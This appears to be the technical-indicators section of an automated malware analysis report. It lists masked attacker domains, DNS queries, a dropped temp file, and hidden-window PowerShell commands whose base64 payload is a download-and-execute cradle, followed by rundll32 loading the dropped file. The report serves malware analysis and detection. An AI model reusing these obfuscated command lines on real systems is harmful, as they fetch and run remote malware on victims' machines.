Technical Information
- http://ma###art.top/034g100/index.php
- %TEMP%\sdkbq.dat
- 'ma###art.top':80
- 'aw#.#mazon.com':443
- 'x.##2.us':80
- 'microsoft.com':80
- 'la#####theather.shop':80
- http://ma###art.top/034g100/main.php
- DNS ASK ma###art.top
- DNS ASK aw#.#mazon.com
- DNS ASK x.##2.us
- DNS ASK microsoft.com
- DNS ASK la#####theather.shop
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...
- '<SYSTEM32>\rundll32.exe' %TEMP%\sdKBQ.dat PluginInit